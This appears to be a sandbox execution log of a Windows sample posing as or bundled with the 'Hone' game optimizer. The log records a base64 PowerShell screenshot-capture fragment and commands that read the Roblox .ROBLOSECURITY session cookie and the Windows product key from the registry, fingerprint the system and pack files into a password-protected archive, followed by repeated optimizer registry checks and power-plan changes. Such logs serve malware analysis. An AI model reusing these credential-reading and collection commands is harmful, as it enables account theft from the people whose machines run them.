AAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rkt2fkxp\rkt2fkxp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C35.tmp" "c:\Users\Admin\AppData\Local\Temp\rkt2fkxp\CSCA56DE6D1AF5D49FCBCBCAC41BC1EE192.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\n8T1k.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\n8T1k.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Hone" /v "Disclaimer" /f

C:\Windows\system32\curl.exe

curl -g -L -# -o "C:\Users\Admin\AppData\Local\Temp\Updater.bat" "https://raw.githubusercontent.com/auraside/HoneCtrl/main/Files/HoneCtrlVer"

C:\Windows\system32\Dism.exe

dism /online /enable-feature /featurename:MicrosoftWindowsWMICore /NoRestart

C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe

C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe {3F511729-BF4E-4763-8326-9B58EB2EF9F5}

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\', 'D:\', 'E:\', 'F:\', 'G:\'

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Unrestricted -NoProfile Checkpoint-Computer -Description 'Hone Restore Point'

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:4

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c date /t

C:\Windows\system32\reg.exe

reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKLM.reg /y

C:\Windows\system32\reg.exe

reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKCU.reg /y

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\System32\choice.exe

C:\Windows\System32\choice.exe /c:1234567XD /n /m "  Select a corresponding number to the options above > "

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo OFF "

C:\Windows\system32\find.exe

find "N/A"

C:\Windows\system32\curl.exe

curl -g -k -L -# -o "C:\Hone\Resources\HoneV2.pow" "https://github.com/auraside/HoneCtrl/raw/main/Files/HoneV2.pow"

C:\Windows\system32\powercfg.exe

powercfg /d 44444444-4444-4444-4444-444444444449

C:\Windows\system32\powercfg.exe

powercfg -import "C:\Hone\Resources\HoneV2.pow" 44444444-4444-4444-4444-444444444449

C:\Windows\system32\powercfg.exe

powercfg /changename 44444444-4444-4444-4444-444444444449 "Hone Ultimate Power Plan V2" "The Ultimate Power Plan to increase FPS, improve latency and reduce input lag."

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic cpu get numberOfCores /value

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get numberOfCores /value

C:\Windows\system32\powercfg.exe

powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0

C:\Windows\system32\powercfg.exe

powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0

C:\Windows\system32\powercfg.exe

powercfg -setactive "44444444-4444-4444-4444-444444444449"

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo OFF "

C:\Windows\system32\find.exe

find "N/A"

C:\Windows\system32\curl.exe

curl -g -k -L -# -o "C:\Hone\Resources\HoneV2.pow" "https://github.com/auraside/HoneCtrl/raw/main/Files/HoneV2.pow"

C:\Windows\system32\powercfg.exe

powercfg /d 44444444-4444-4444-4444-444444444449

C:\Windows\system32\powercfg.exe

powercfg -import "C:\Hone\Resources\HoneV2.pow" 44444444-4444-4444-4444-444444444449

C:\Windows\system32\powercfg.exe

powercfg /changename 44444444-4444-4444-4444-444444444449 "Hone Ultimate Power Plan V2" "The Ultimate Power Plan to increase FPS, improve latency and reduce input lag."

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic cpu get numberOfCores /value

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get numberOfCores /value

C:\Windows\system32\powercfg.exe

powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 1

C:\Windows\system32\powercfg.exe

powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0

C:\Windows\system32\powercfg.exe

powercfg -setactive "44444444-4444-4444-4444-444444444449"

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

